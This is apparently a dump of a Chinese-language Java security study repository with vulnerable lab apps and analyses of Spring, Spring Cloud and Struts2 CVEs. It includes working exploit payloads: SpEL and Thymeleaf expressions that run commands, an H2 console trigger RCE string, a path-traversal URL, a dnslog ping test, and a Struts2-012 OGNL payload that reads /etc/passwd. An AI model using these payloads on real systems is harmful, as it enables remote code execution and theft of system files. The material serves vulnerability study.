https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/EZvulhub/SpELTest.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/AccessingDataRestApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/AccessingDataRestApplication.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/Person.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/Person.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/PersonRepository.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/main/com/example/accessingdatarest/PersonRepository.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/classes/java/test/com/example/accessingdatarest/AccessingDataRestApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/build/classes/java/test/com/example/accessingdatarest/AccessingDataRestApplicationTests.class -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/tmp/compileJava/source-classes-mapping.txt: -------------------------------------------------------------------------------- 1 | com/example/accessingdatarest/AccessingDataRestApplication.java 2 | com.example.accessingdatarest.AccessingDataRestApplication 3 | com/example/accessingdatarest/PersonRepository.java 4 | com.example.accessingdatarest.PersonRepository 5 | EZvulhub/Main.java 6 | EZvulhub.Main 7 | com/example/accessingdatarest/Person.java 8 | com.example.accessingdatarest.Person 9 | EZvulhub/SpELTest.java 10 | EZvulhub.SpELTest 11 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build/tmp/compileTestJava/source-classes-mapping.txt: -------------------------------------------------------------------------------- 1 | com/example/accessingdatarest/AccessingDataRestApplicationTests.java 2 | com.example.accessingdatarest.AccessingDataRestApplicationTests 3 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-6.5.1-bin.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/settings.gradle: -------------------------------------------------------------------------------- 1 | rootProject.name = 'accessing-data-rest' 2 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/EZvulhub/Main.java: -------------------------------------------------------------------------------- 1 | package EZvulhub; 2 | 3 | public class Main { 4 | public static void main(String[] args) { 5 | String command = "calc"; 6 | generateCommond(command); 7 | } 8 | 9 | private static void generateCommond(String command) { 10 | System.out.println("m命令: " + command); 11 | byte[] result = command.getBytes(); 12 | System.out.print("命令转为字节数组表示: "); 13 | System.out.print("new byte[]{"); 14 | for (int i = 0; i < result.length; i++) { 15 | if (i != result.length - 1) { 16 | System.out.print(result[i] + ","); 17 | } else { 18 | System.out.print(result[i]); 19 | } 20 | } 21 | System.out.print("}\n"); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/EZvulhub/SpELTest.java: -------------------------------------------------------------------------------- 1 | //package EZvulhub; 2 | // 3 | //import org.springframework.expression.Expression; 4 | //import org.springframework.expression.ExpressionParser; 5 | //import org.springframework.expression.spel.standard.SpelExpressionParser; 6 | // 7 | //public class SpELTest { 8 | // public static void main(String[] args) { 9 | // String SpEL = "T(java.lang.Runtime).getRuntime().exec('calc')"; 10 | // // 11 | // testSpEL(SpEL); 12 | // } 13 | // private static void testSpEL(String spEL){ 14 | // ExpressionParser parser = new SpelExpressionParser(); 15 | // Expression exp = parser.parseExpression(spEL); 16 | // exp.getValue();//Value(); 17 | // } 18 | //} 19 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/EZvulhub/test.java: -------------------------------------------------------------------------------- 1 | package EZvulhub; 2 | 3 | public class test { 4 | public static void main(String[] args) { 5 | Runtime.getRuntime().exec("ping cw58lb.dnslog.cn"); 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/com/example/accessingdatarest/AccessingDataRestApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.accessingdatarest; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class AccessingDataRestApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(AccessingDataRestApplication.class, args); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/com/example/accessingdatarest/Person.java: -------------------------------------------------------------------------------- 1 | package com.example.accessingdatarest; 2 | 3 | import javax.persistence.Entity; 4 | import javax.persistence.GeneratedValue; 5 | import javax.persistence.GenerationType; 6 | import javax.persistence.Id; 7 | 8 | @Entity 9 | public class Person { 10 | 11 | @Id 12 | @GeneratedValue(strategy = GenerationType.AUTO) 13 | private long id; 14 | 15 | private String firstName; 16 | private String lastName; 17 | 18 | public String getFirstName() { 19 | return firstName; 20 | } 21 | 22 | public void setFirstName(String firstName) { 23 | this.firstName = firstName; 24 | } 25 | 26 | public String getLastName() { 27 | return lastName; 28 | } 29 | 30 | public void setLastName(String lastName) { 31 | this.lastName = lastName; 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/src/main/java/com/example/accessingdatarest/PersonRepository.java: -------------------------------------------------------------------------------- 1 | package com.example.accessingdatarest; 2 | 3 | import java.util.List; 4 | 5 | import org.springframework.data.repository.PagingAndSortingRepository; 6 | import org.springframework.data.repository.query.Param; 7 | import org.springframework.data.rest.core.annotation.RepositoryRestResource; 8 | 9 | @RepositoryRestResource(collectionResourceRel = "people", path = "people") 10 | public interface PersonRepository extends PagingAndSortingRepository { 11 | 12 | List findByLastName(@Param("name") String name); 13 | 14 | } 15 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-1270 2 | 3 | CVE-2018-1270 表达式RCE环境 4 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/Bean/Greeting.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo.Bean; 2 | 3 | /** 4 | * @ClassName Greeting 5 | * @Description TODO 6 | * @Author wangyu89 7 | * @Create Time 2018/12/13 22:40 8 | * @Version 1.0 9 | */ 10 | public class Greeting { 11 | private String content; 12 | 13 | public Greeting() { 14 | } 15 | 16 | public Greeting(String content) { 17 | this.content = content; 18 | } 19 | 20 | public String getContent() { 21 | return content; 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/Bean/HelloMessage.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo.Bean; 2 | 3 | /** 4 | * @ClassName HelloMessage 5 | * @Description TODO 6 | * @Author wangyu89 7 | * @Create Time 2018/12/13 22:40 8 | * @Version 1.0 9 | */ 10 | public class HelloMessage { 11 | private String name; 12 | 13 | public HelloMessage() { 14 | } 15 | 16 | public HelloMessage(String name) { 17 | this.name = name; 18 | } 19 | 20 | public String getName() { 21 | return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/Controller/GreetingController.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo.Controller; 2 | 3 | import com.venscor.demo.Bean.Greeting; 4 | import com.venscor.demo.Bean.HelloMessage; 5 | import org.springframework.messaging.handler.annotation.MessageMapping; 6 | import org.springframework.messaging.handler.annotation.SendTo; 7 | import org.springframework.stereotype.Controller; 8 | import org.springframework.web.util.HtmlUtils; 9 | 10 | /** 11 | * @ClassName GreetingController 12 | * @Description TODO 13 | * @Author wangyu89 14 | * @Create Time 2018/12/13 22:39 15 | * @Version 1.0 16 | */ 17 | @Controller 18 | public class GreetingController { 19 | @MessageMapping("/hello") 20 | @SendTo("/topic/greetings") 21 | public Greeting greeting(HelloMessage message) throws Exception { 22 | Thread.sleep(1000); // simulated delay 23 | return new Greeting("Hello, " + HtmlUtils.htmlEscape(message.getName()) + "!"); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/SpringmessagespelApplication.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class SpringmessagespelApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(SpringmessagespelApplication.class, args); 11 | } 12 | 13 | } 14 | 15 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270-master/CVE-2018-1270-master/src/main/java/com/venscor/demo/WebSocketConfig.java: -------------------------------------------------------------------------------- 1 | package com.venscor.demo; 2 | 3 | import org.springframework.context.annotation.Configuration; 4 | import org.springframework.messaging.simp.config.MessageBrokerRegistry; 5 | import org.springframework.web.socket.config.annotation.EnableWebSocketMessageBroker; 6 | import org.springframework.web.socket.config.annotation.StompEndpointRegistry; 7 | import org.springframework.web.socket.config.annotation.WebSocketMessageBrokerConfigurer; 8 | 9 | /** 10 | * @ClassName WebSocketConfig 11 | * @Description TODO 12 | * @Author wangyu89 13 | * @Create Time 2018/12/13 22:31 14 | * @Version 1.0 15 | */ 16 | @Configuration 17 | @EnableWebSocketMessageBroker 18 | public class WebSocketConfig implements WebSocketMessageBrokerConfigurer { 19 | @Override 20 | public void registerStompEndpoints(StompEndpointRegistry registry) { 21 | registry.addEndpoint("/gs-guide-websocket").withSockJS(); 22 | } 23 | 24 | @Override 25 | public void configureMessageBroker(MessageBrokerRegistry registry) { 26 | registry.enableSimpleBroker("/topic"); 27 | registry.setApplicationDestinationPrefixes("/app"); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/CVE-2018-1270.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/CVE-2018-1270.pdf -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/012A8071.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/012A8071.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/1.gif -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220152220717.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220152220717.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154332152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154332152.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154922801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220154922801.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160150498.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160150498.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160459956.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220160459956.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161508697.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161508697.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161825423.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161825423.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161931650.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220161931650.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220162251047.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/image-20210220162251047.png -------------------------------------------------------------------------------- /Spring/CVE-2018-1270-SPEL/分析.assets/未命名-副本.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2018-1270-SPEL/分析.assets/未命名-副本.gif -------------------------------------------------------------------------------- /Spring/Readme.md: -------------------------------------------------------------------------------- 1 | # Spring 2 | 3 | + [aop技术](./spring-aop底层.pdf) 4 | + [cve-2016-4977]() 5 | + [cve-2017-4971]() 6 | + [cve-2018-1270]() 7 | -------------------------------------------------------------------------------- /Spring/spring-aop底层.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/spring-aop底层.pdf -------------------------------------------------------------------------------- /Springboot/Readme.md: -------------------------------------------------------------------------------- 1 | # Springboot 漏洞 2 | 3 | 参考:https://github.com/LandGrey/SpringBootVulExploit 4 | 写的非常全. 5 | 6 | **该系列漏洞主要是通过env的配置接口进行配置,刷新或者重启触发漏洞** 7 | 8 | 补:0x07:h2 database console JNDI RCE 9 | 10 | 限制: 11 | 开启 -webAllowOthers 选项,支持外网访问 12 | 开启 -ifNotExists 选项,支持创建数据库 13 | 14 | 不需要出网利用: 15 | ``` 16 | language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=org.h2.Driver&url=jdbc%3ah2%3amem%3atest%3bMODE%3dMSSQLServer%3binit%3dCREATE+TRIGGER+shell3+BEFORE+SELECT+ON+INFORMATION_SCHEMA.TABLES+AS+$$//javascript%0a%0ajava.lang.Runtime.getRuntime().exec('cmd+/c+calc.exe')$$&user=sa&password= 17 | ``` 18 | -------------------------------------------------------------------------------- /Springcolud/Readme.md: -------------------------------------------------------------------------------- 1 | # Springcolud 2 | 3 | ## CVE-2021-22053 4 | 5 | >今天有幸看到了三梦师傅写的[CVE-2021-22053: Spring Cloud Netflix Dashboard template resolution vulnerability](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053) poc,在好自己最近在看spring-cloud这些微服务,然后就简单的看了看学习。 6 | 7 | 先简单的介绍一下**hystrix** 8 | 9 | ## Hystrix 10 | 11 | 容错监控机制 12 | 13 | 也就是微服务的容错机制是提前预设解决⽅案,系统进⾏⾃主调节,遇到问题及时处理 14 | 15 | ### Hystrix的优点 16 | 17 | ``` 18 | 服务隔离机制 19 | 服务降级机制 20 | 熔断机制 21 | 提供实时的监控和报警功能 22 | 提供实时的配置修改功能 23 | ``` 24 | 25 | 而hystrix-dashboard 就是可视化界⾯组件。 26 | 27 | 所以简单的说spring-cloud-starter-netflix-hystrix-dashboard 就是springcolud中的一个组件,是**Hystrix** 容错监控机制的可视化界⾯组件。 28 | 29 | 30 | 31 | ## 复现 32 | 33 | 三梦师傅也说明了漏洞版本 34 | 35 | 漏洞版本:spring-cloud-starter-netflix-hystrix-dashboard **2.2.0.RELEASE to 2.2.9.RELEASE** 36 | 37 | 并且三梦师傅提供了漏洞环境,本地搭建起测试了一下,成功利用。 38 | 39 | ![image-20211123210133522](https://user-images.githubusercontent.com/63966847/146506766-df253d5b-d032-43cf-8019-d4af56376cca.png) 40 | 41 | 42 | ## 分析 43 | 44 | 还是经典的对比分析,对比漏洞版本和fix版本 45 | 46 | ![image-20211123210337765](https://user-images.githubusercontent.com/63966847/146506804-c8600043-5e0a-4d87-b3be-3230a1fd8587.png) 47 | 48 | 49 | 可以发现漏洞版本对{path}变量可以控制,熟悉**Thymeleaf**模板注入的师傅一眼就可以看出来了。 50 | 51 | 在该版本依赖的Thymeleaf组件版本是3.0.12。正好三梦师傅师傅之前写过文章bypass。前几天panda师傅也发了文章关于这部分进行介绍。 52 | 53 | ![image-20211123211222190](https://user-images.githubusercontent.com/63966847/146506787-871d831a-19bd-4571-a06b-19a65bdf080f.png) 54 | 55 | 56 | poc 57 | 58 | ```http 59 | http://127.0.0.1:8080/hystrix/;/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22calc%22)%7D__::.x/ 60 | ``` 61 | 62 | -------------------------------------------------------------------------------- /Struts2/README.md: -------------------------------------------------------------------------------- 1 | # Struts02漏洞学习 2 | 3 | >前段时间就开始学习java安全了,之前分析过spring框架的spel表达式注入,都是使用构造好的环境。所有在环境搭建方面没有花费很多时间,于是就开始了Struts框架漏洞学习。 4 | 5 | **Struts框架**可以说是漏洞最多的框架,而基本上是使用`OGNL表达式注入`其实就有点和`EL`表达式,都是为了方便写代码。。。可能我是这么理解的。 6 | 7 | [OGNL表达式介绍](https://www.cnblogs.com/renchunxiao/p/3423299.html) 8 | 9 | 还有说明一下,这里的环境都是自己搭建的,使用花费了我好多时间。。。(因为`struts.xml`配置文件前面多了一个空格导致环境出问题。。还是自己tcl)这里推荐去了解一下Struts02框架。简简单单的学习一下就OK。 10 | 11 | [Struts2框架基础](https://www.cnblogs.com/cenyu/p/6219894.html)可以看文章也可以看视频,我比较笨就看的视频加看文章。[2020最新Struts2框架教程——SSH系列](https://www.bilibili.com/video/BV1tp4y1v7gc) 12 | 13 | **接下来就开始我们的Struts02漏洞学习** 14 | 之前看了一个文章比较好,可以说是Struts2漏洞的原理吧。。。 15 | [Struts2漏洞利用原理及OGNL机制研究](https://xz.aliyun.com/t/225#toc-0) 16 | 17 | ## 下面是搭建搭建 18 | 漏洞版本去官网下载就可以 19 | [漏洞版本](http://archive.apache.org/dist/struts/binaries/) 20 | ![](./img/环境.png) 21 | 22 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/Struts001.java: -------------------------------------------------------------------------------- 1 | package com.vulhub.struts; 2 | 3 | import com.opensymphony.xwork2.ActionSupport; 4 | 5 | public class Struts001 extends ActionSupport { 6 | private String username; 7 | private String password; 8 | 9 | 10 | @Override 11 | public String execute() throws Exception { 12 | if ((this.username.isEmpty()) || (this.password.isEmpty())) { 13 | return "error"; 14 | } 15 | if ((this.username.equalsIgnoreCase("admin")) 16 | && (this.password.equals("admin")) 17 | ) { 18 | return "success"; 19 | } 20 | return "error"; 21 | 22 | } 23 | public void setPassword(String password) { 24 | this.password = "%{1+1}"; 25 | } 26 | 27 | public String getPassword() { 28 | return password; 29 | } 30 | 31 | public String getUsername() { 32 | return username; 33 | } 34 | 35 | public void setUsername(String username) { 36 | this.username = username; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/Struts02-001简单分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-001/Struts02-001简单分析.pdf -------------------------------------------------------------------------------- /Struts2/Struts2-001/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" contentType="text/html; charset=UTF-8" 2 | pageEncoding="UTF-8"%> 3 | <%@ taglib prefix="s" uri="/struts-tags" %> 4 | 5 | 6 | 7 | 8 | S2-001 9 | 10 | 11 |

S2-001 Demo

12 |

link: https://cwiki.apache.org/confluence/display/WW/S2-001

13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | org.vulhub.web 8 | struts01 9 | 1.0-SNAPSHOT 10 | war 11 | 12 | struts01 Maven Webapp 13 | 14 | http://www.example.com 15 | 16 | 17 | UTF-8 18 | 1.7 19 | 1.7 20 | 21 | 22 | 23 | 24 | junit 25 | junit 26 | 4.11 27 | test 28 | 29 | 30 | 31 | org.apache.struts 32 | struts2-core 33 | 2.0.8 34 | 35 | 36 | 37 | org.apache.logging.log4j 38 | log4j-core 39 | 2.10.0 40 | 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 21 | /show.jsp 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | /welcome.jsp 31 | /struts001.jsp 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /Struts2/Struts2-001/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | struts2 8 | 9 | org.apache.struts2.dispatcher.FilterDispatcher 10 | 11 | 12 | 13 | struts2 14 | 15 | /* 16 | 17 | Archetype Created Web Application 18 | 19 | 20 | -------------------------------------------------------------------------------- /Struts2/Struts2-002/Struts02-002简单分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-002/Struts02-002简单分析.pdf -------------------------------------------------------------------------------- /Struts2/Struts2-002/index.jsp: -------------------------------------------------------------------------------- 1 | 4 | 5 | <%@taglib prefix="s" uri="/struts-tags" %> 6 | 7 | 8 | 9 | 10 | ">你好Struts2 11 | 12 | 13 | -------------------------------------------------------------------------------- /Struts2/Struts2-004/README.md: -------------------------------------------------------------------------------- 1 | # Struts2-004 2 | 3 | ## 漏洞概要 4 | 5 | Struts2-004是一个目录遍历漏洞。 6 | 7 | 影响版本: **Struts 2.0.0 - 2.0.11.2、Struts 2.1.0 - 2.1.2** 。 8 | 9 | 官方通告:https://cwiki.apache.org/confluence/display/WW/S2-004 10 | 11 | ## 漏洞原理 12 | 13 | 本次漏洞,主要问题出现在 **FilterDispatcher** 类对静态资源文件的处理。当请求资源文件路径以 **/struts** 开头时,就会调用 **findStaticResource** 方法寻找资源。 14 | 15 | ```java 16 | if (serveStatic && resourcePath.startsWith("/struts")) { 17 | String name = resourcePath.substring("/struts".length()); 18 | this.findStaticResource(name, request, response); 19 | } else { 20 | chain.doFilter(request, response); 21 | } 22 | ``` 23 | 24 | 跟进 **findStaticResource** 方法,我们发现如果文件后缀不为 **.class** ,则调用 **findInputStream** 来读取文件内容,而且文件路径会进行一次 **URLdecode** ,但是这里没有对文件名进行任何过滤,这也导致了路径穿越问题。 25 | 26 | ```java 27 | if (!name.endsWith(".class")) { 28 | String[] arr$ = this.pathPrefixes; 29 | int len$ = arr$.length; 30 | 31 | for(int i$ = 0; i$ < len$; ++i$) { 32 | String pathPrefix = arr$[i$]; 33 | InputStream is = this.findInputStream(name, pathPrefix);//读文件 34 | ... 35 | } 36 | ``` 37 | 38 | poc:`http://localhost:8081/struts/..%2f..%2f` 39 | 40 | ## 漏洞修复 41 | 42 | 修复代码,使用 **URL.getFile()** 获取文件的真实路径,然后在用 **endWith** 来判断后缀,二者结合可以有效解决路径穿越问题。 43 | 44 | ## 参考 45 | 46 | >https://mochazz.github.io/2020/06/28/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BStruts2-004/ 47 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/Struts007.java: -------------------------------------------------------------------------------- 1 | package com.vulhub.struts; 2 | 3 | import com.opensymphony.xwork2.ActionSupport; 4 | 5 | public class Struts007 extends ActionSupport { 6 | private Integer age = null; 7 | private String name = null; 8 | private String email = null; 9 | 10 | public Struts007() { 11 | } 12 | 13 | public void setAge(Integer age) { 14 | this.age = age; 15 | } 16 | 17 | public Integer getAge() { 18 | return this.age; 19 | } 20 | 21 | public void setName(String name) { 22 | this.name = name; 23 | } 24 | 25 | public String getName() { 26 | return this.name; 27 | } 28 | 29 | public void setEmail(String email) { 30 | this.email = email; 31 | } 32 | 33 | public String getEmail() { 34 | return this.email; 35 | } 36 | 37 | public String execute() throws Exception { 38 | return !this.name.isEmpty() && !this.email.isEmpty() ? "success" : "error"; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/Struts2-007简单分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-007/Struts2-007简单分析.pdf -------------------------------------------------------------------------------- /Struts2/Struts2-007/UserAction-validation.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 1 9 | 150 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" contentType="text/html; charset=UTF-8" 2 | pageEncoding="UTF-8"%> 3 | <%@ taglib prefix="s" uri="/struts-tags" %> 4 | 5 | 6 | 7 | 8 | S2-007 9 | 10 | 11 |

S2-007 Demo

12 |

link: https://struts.apache.org/docs/s2-007.html

13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 11 | 12 | 13 | 14 | 15 | 16 | /welcome.jsp 17 | /index.jsp 18 | /index.jsp 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/welcome.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" contentType="text/html; charset=UTF-8" 2 | pageEncoding="UTF-8"%> 3 | <%@ taglib prefix="s" uri="/struts-tags" %> 4 | 5 | 6 | 7 | 8 | S2-007 9 | 10 | 11 |

Name:

12 |

Email:

13 |

Age:

14 | 15 | 16 | -------------------------------------------------------------------------------- /Struts2/Struts2-009/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-009/1.png -------------------------------------------------------------------------------- /Struts2/Struts2-012/README.md: -------------------------------------------------------------------------------- 1 | # Struts2-012 2 | 3 | ## 漏洞介绍 4 | 5 | 该漏洞是在`struts.xml`中使用了重定向类型,并且还使用 ${param_name} 作为重定向变量。当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。 6 | 7 | ## 漏洞版本 8 | 9 | 影响版本: 2.1.0 - 2.3.13 10 | 11 | 漏洞详情: http://struts.apache.org/docs/s2-012.html 12 | 13 | ## 配置文件内容 14 | 15 | `struts.xml` 16 | 17 | ```xml 18 | 19 | 20 | /index.jsp?name=${name} 21 | /index.jsp 22 | /index.jsp 23 | 24 | 25 | ``` 26 | 27 | ## poc 28 | 29 | ``` 30 | %{ 31 | #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(), 32 | #b=#a.getInputStream(), 33 | #c=new java.io.InputStreamReader(#b), 34 | #d=new java.io.BufferedReader(#c), 35 | #e=new char[50000], 36 | #d.read(#e), 37 | #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), 38 | #f.getWriter().println(new 